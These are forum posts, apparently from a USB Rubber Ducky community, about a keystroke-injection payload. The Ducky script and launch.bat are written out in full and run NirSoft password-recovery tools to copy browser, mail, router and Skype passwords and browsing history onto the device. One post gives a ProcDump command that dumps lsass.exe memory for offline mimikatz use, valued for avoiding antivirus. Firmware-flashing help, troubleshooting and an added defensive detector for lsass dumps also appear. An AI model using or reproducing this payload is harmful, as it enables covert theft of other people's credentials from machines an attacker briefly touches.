Posts posted by odnorazovaya
-
-
WOW! mimikatz is amazing! I'm surprised this isn't more widely known. Everyone is so busy worrying about cracking Windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to brute force WPA keys. It just spits it out in plaintext!
I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this:
procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
The beauty here is that procdump will not get flagged by AV like mimikatz already is (6/xx on virustotal already) because it's an official Microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run mimikatz on it later on our own PC. How come everyone always wants the duck to grab things from the internet? We have the capability to save files on the ducky so why not use that instead?
I'm going to try and come up with payload that simply saves a procdump file to the ducky and I'll post it here.
sounds promising, looking forward to seeing it in action.
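A defender's view of the ProcDump command quoted in this post, as an added example that is not part of the original thread: because the tool is a signed Microsoft utility, detection has to key on what it is asked to do, so this sketch classifies process-creation records that point ProcDump at lsass.exe. Field names follow Sysmon Event ID 1; the sample records, the host name WS01 and the verdict strings are constructed for illustration.

```python
import ntpath
import shlex

FULL_MEMORY_FLAGS = {"ma", "mp"}   # ProcDump switches that include process memory
PROCDUMP_NAMES = {"procdump", "procdump.exe", "procdump64.exe"}

# Constructed process-creation records (Sysmon Event ID 1 field names), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\procdump.exe", "OriginalFileName": "procdump",
     "CommandLine": r"procdump.exe -accepteula -ma lsass.exe WS01_lsass.dmp"},
    {"Image": r"C:\Users\Public\pd.exe", "OriginalFileName": "procdump",
     "CommandLine": r"pd.exe /accepteula /ma lsass.exe out.dmp"},
    {"Image": r"C:\Tools\procdump64.exe", "OriginalFileName": "procdump",
     "CommandLine": r"procdump64.exe -ma notepad.exe notepad.dmp"},
    {"Image": r"C:\Windows\System32\tasklist.exe", "OriginalFileName": "tasklist.exe",
     "CommandLine": r'tasklist /fi "imagename eq lsass.exe"'},
    {"Image": r"C:\Tools\procdump.exe", "OriginalFileName": "procdump",
     "CommandLine": r"procdump.exe -accepteula lsass.exe"},
]

def _args(cmdline):
    """Lower-cased arguments after the program name, with Windows backslashes kept."""
    try:
        parts = shlex.split(cmdline, posix=False)
    except ValueError:                 # unbalanced quote in the logged command line
        parts = cmdline.split()
    return [p.strip('"').lower() for p in parts[1:]]

def classify(event):
    """Return a verdict string when ProcDump targets lsass.exe, else None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    # OriginalFileName comes from the PE version info, so the match
    # does not depend on the file name on disk.
    if image not in PROCDUMP_NAMES and original not in PROCDUMP_NAMES:
        return None
    args = _args(event.get("CommandLine", ""))
    if not any(ntpath.basename(a) in ("lsass", "lsass.exe") for a in args):
        return None
    full = any(a[:1] in ("-", "/") and a[1:] in FULL_MEMORY_FLAGS for a in args)
    return "lsass-full-memory-dump" if full else "lsass-minidump"

def scan(events):
    """List of (index, verdict) for every event that matched."""
    return [(i, v) for i, e in enumerate(events) if (v := classify(e))]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_EVENTS):
        print(index, verdict, SAMPLE_EVENTS[index]["CommandLine"])
```

Command-line matching of this kind complements, and does not replace, monitoring of process-access events against lsass.exe and enabling LSA protection on the host.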
-
C:\Users\My_Username>for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
'diskpart' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\My_Username>set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
C:\Users\My_Username>%DUCKYdrive%\launch.bat
The system cannot find the path specified.
C:\Users\My_Username>
Used the same c_duck_v2_S002 firmware, could only test it on Win 7 64 Ultimate, don't have any other machine around at the moment. Seems like it's having some issues executing diskpart this time.
-
Here is what I have come up with. I am using the googleknowsbest script, as I am a fan of scripts that run on all Windows environments. I also added logic to contain all the output in a folder called MrGraysRubberHacks so the root of my duck is not all crowded. I have also observed something, when the loop is engaged in the command prompt, there is a sizable delay, but the command prompt appears to have a buffer that catches any subsequent keystrokes, so there is no problem with the execution of the script.
ENCODE:
DEFAULT_DELAY 25
REM File: MrGraysRubberHacks.txt
REM Target: WINDOWS VISTA/7
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 100
STRING cmd
DELAY 100
ENTER
DELAY 150
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
ENTER
STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
ENTER
STRING %DUCKYdrive%\launch.bat
ENTER

LAUNCH.BAT file:
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
REM Output everything to this folder so I dont have everything on the duck's root.
set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt
start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt
start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt
start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt
start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt
start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt
start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt
start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt
start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt
start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt
start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt
start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt
start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt
If you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items:
ENCODE:
...
STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
ENTER
...

LAUNCH.BAT file:
...
REM Output everything to this folder so I dont have everything on the duck's root.
set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
...
getting my hands on it now, will let you know how it went after testing this on couple PC's. thanks for your time and effort.
-
If you all are still having errors, post what operating system you are using, and what firmware you have installed. I cannot make bricks without clay.
our bad.
i have tested on 2 machines
win 7 64 - ultimate
win7 32 - professional.
on win7 32 pro - it gave me a slightly different error, just saying that path isn't found. the error i have posted is from win7 64 - ultimate.
as per your suggestion i have flashed to c_duck_v2_S002 (haven't tried any other), waited until it said that DUCKY(WHATEVER DRIVE:) is mounted, and triggered the payload. the same result over and over. googleknowsbest's version gives the same error. thanks
-
Yes you're doing the right thing.
There used to be a website called www.usbrubberducky.com (full of ducky resources) - it got owned, now the URL redirects to these forums.
oh, ok, got it.
-
Make sure you have the right firmware installed, I would recommend c_duck_v2_s002.hex from https://code.google.com/p/ducky-decode/ on the download page. This firmware if installed correctly will launch the payload when the ducky trigger is pressed. Wait for the removable media to mount to the computer, then launch the payload. If the removable media is not mounted when the payload is launched, it will not execute correctly.
C:\Users\MY_User>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
'wmic' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\MY_User>%myd%\launch.bat
The system cannot find the path specified.
this the actual error im getting...
-
When I try and run it I always get "The system can not find the path specified". I tried changing Launch.bat to Launch.exe and still the same problem. What am I doing wrong?
same here. tried both overwraith's and googleknowsbest's versions. getting the same error over and over. please, any suggestions anyone?
-
thanks for your answer, i got it working without a single issue.
-
Should not really matter, are you having problems?
Duck Programming vanished with usbrubberducky.com, people were asking so I made the original available.
i wanted to make sure i am doing the right thing before facing ones (problems). what do you mean by: "Duck Programming vanished with usbrubberducky.com"?
thanks for your response btw
-
Did a clean install today on Windows7, XP should work in a similar manner.
Installed Flip.
Inserted Ducky (in dfu-mode, continually hold the ducky's button as you insert the ducky, if it's not in dfu-mode - you were not pushing the button, and you can not flash the ducky)
Performed Manual Driver install (see pics)
Worked perfectly - I didn't have to modify/copy any additional binaries or environment variables
If this doesn't work, you might have a dead-duck. My advice would be to contact the hak5 shop (shop@hak5.org) for an exchange.
hi, would you please help me with my question above? thanks.
-
i would really appreciate your answers guys.
-
This guide is for re-flashing/upgrading the rubberducky firmware using WINDOWS XP x86 (should be the same for Vista, Windows 7+)
Installation Media
http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip
Flip download link: http://www.atmel.com/tools/FLIP.aspx
- also download the preferred firmware.hex from the duck wiki site beforehand,
in here: http://code.google.com/p/ducky-decode/
You may also need Microsoft Visual C++ Redistributable:
x86 - http://www.microsoft.com/en-gb/download/deails.aspx?id=5555
x64 - http://www.microsoft.com/en-gb/download/details.aspx?id=14632
Installation
- Install MS Visual C++ Redistributable
- Unzip DuckProgramming.zip
- Install Flip
- Install Atmel signed Driver
Atmel Driver Problems
You will have to install this manually! Windows installs the wrong driver!
So to install manually use the add hardware wizard and select have disk and scroll down to at32ucb.
Alternatively, make sure the Duck is in DFU-mode (keep pushing the button upon insertion), and go to Device Manager.
- Then look for a DFU-xxx under USB Devices
- Right Click
- Update Driver
- Then Manually specify driver.
- And point the program to the Atmel Signed Drivers from the unzipped DuckProgramming.zip
Running Program.bat to Re-flash Ducky
- open dos cmd prompt
- in cmd prompt type in cd C:\Program Files\Atmel\Flip 3.4.2\bin
- in the same cmd prompt type in
program.bat YourNewFirmware.hex
It's a success if it all says pass
Don't worry about the overlap warning!
hi everyone,
first time flashing in here. though it seems like an easy noob friendly guide, i'm still a bit confused about one part. Duck Programming.zip contained a file JRE_Flip_Installer_3.4.2.exe. And you also posted a link for a Flip installer download , which i followed and downloaded a version Flip Installer - 3.4.7.112.exe since i already have JRE installed. so when you say Install Flip, which file were you referring to, the one from download link, or the one from the zip? would you please clarify this for me. I'm running win 7 ultimate 64.
thanks
[Payload]: Mr Gray's Password, History recovery tool for Rubber Ducky
in Classic USB Rubber Ducky